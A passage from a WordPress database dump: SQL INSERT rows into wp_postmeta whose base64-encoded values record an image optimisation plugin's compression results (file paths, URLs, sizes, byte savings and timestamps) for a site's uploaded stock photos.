GF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ1NSwidGltZSI6MTQ4MzU0Nzg1MywiaWQiOjI3NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo2NTcsInRpbWUiOjE0ODM1NDc4NTcsImlkIjoyNzcwfV0='); 
INSERT INTO `wp_postmeta` VALUES (28770, 2768, 'wpfc_optimisation_reduction', '10796'); 
INSERT INTO `wp_postmeta` VALUES (28771, 2768, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTIuanBnIiwid2lkdGgiOjU4NzIsImhlaWdodCI6MzcxMiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0Nzg2MiwiaWQiOiIyNzY4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY4OCwidGltZSI6MTQ4MzU0Nzg2NiwiaWQiOjI3Njh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi04MDB4NTA2LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTA2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItODAweDUwNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTgwMHg1MDYuanBnIiwicmVkdWN0aW9uIjoxMjYzLCJ0aW1lIjoxNDgzNTQ3ODcwLCJpZCI6Mjc2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTc2OHg0ODUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi03Njh4NDg1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItNzY4eDQ4NS5qcGciLCJyZWR1Y3Rpb24iOjEwOTYsInRpbWUiOjE0ODM1NDc4NzQsImlkIjoyNzY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItMTYwMHgxMDExLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwMTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi0xNjAweDEwMTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi0xNjAweDEwMTEuanBnIiwicmVkdWN0aW9uIjo0OTE1LCJ0aW1lIjoxNDgzNTQ3ODc5LCJpZCI6Mjc2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyNCwidGltZSI6MTQ4MzU0Nzg4MiwiaWQiOjI3Njh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0ODYsInRpbWUiOjE0ODM1NDc4ODUsImlkIjoyNzY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTQ5LCJ0aW1lIjoxNDgzNTQ3ODg5LCJpZCI6Mjc2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE4ODY0NzUyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxODg2NDc1Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTg4NjQ3NTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExNzUsInRpbWUiOjE0ODM1NDc4OTIsImlkIjoyNzY4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28772, 2766, 'wpfc_optimisation_reduction', '18981'); 
INSERT INTO `wp_postmeta` VALUES (28773, 2766, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvTEdXMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0xHVzIuanBnIiwid2lkdGgiOjEwMCwiaGVpZ2h0Ijo3OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0xHVzIuanBnIiwicmVkdWN0aW9uIjoxODk4MSwidGltZSI6MTQ4MzU0Nzg5OSwiaWQiOiIyNzY2In1d'); 
INSERT INTO `wp_postmeta` VALUES (28774, 2747, 'wpfc_optimisation_reduction', '16076'); 
INSERT INTO `wp_postmeta` VALUES (28775, 2747, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzkwMywiaWQiOiIyNzQ3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjExNDUsInRpbWUiOjE0ODM1NDc5MDYsImlkIjoyNzQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjU3MiwidGltZSI6MTQ4MzU0NzkxMCwiaWQiOjI3NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMzQ3LCJ0aW1lIjoxNDgzNTQ3OTE0LCJpZCI6Mjc0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NjA4NiwidGltZSI6MTQ4MzU0NzkxOSwiaWQiOjI3NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo3NTEsInRpbWUiOjE0ODM1NDc5MjIsImlkIjoyNzQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NjQ5LCJ0aW1lIjoxNDgzNTQ3OTI2LCJpZCI6Mjc0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjc3MCwidGltZSI6MTQ4MzU0NzkzMSwiaWQiOjI3NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ2MS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NjEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDYxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNzU2LCJ0aW1lIjoxNDgzNTQ3OTM2LCJpZCI6Mjc0N31d'); 
INSERT INTO `wp_postmeta` VALUES (28776, 2742, 'wpfc_optimisation_reduction', '3053055'); 
INSERT INTO `wp_postmeta` VALUES (28777, 2742, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAuanBnIiwicmVkdWN0aW9uIjozMDUzMDQ3LCJ0aW1lIjoxNDgzNTQ3OTQ4LCJpZCI6IjI3NDIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Nzk1MSwiaWQiOjI3NDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3OTU0LCJpZCI6Mjc0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc5NTcsImlkIjoyNzQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3OTYxLCJpZCI6Mjc0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLz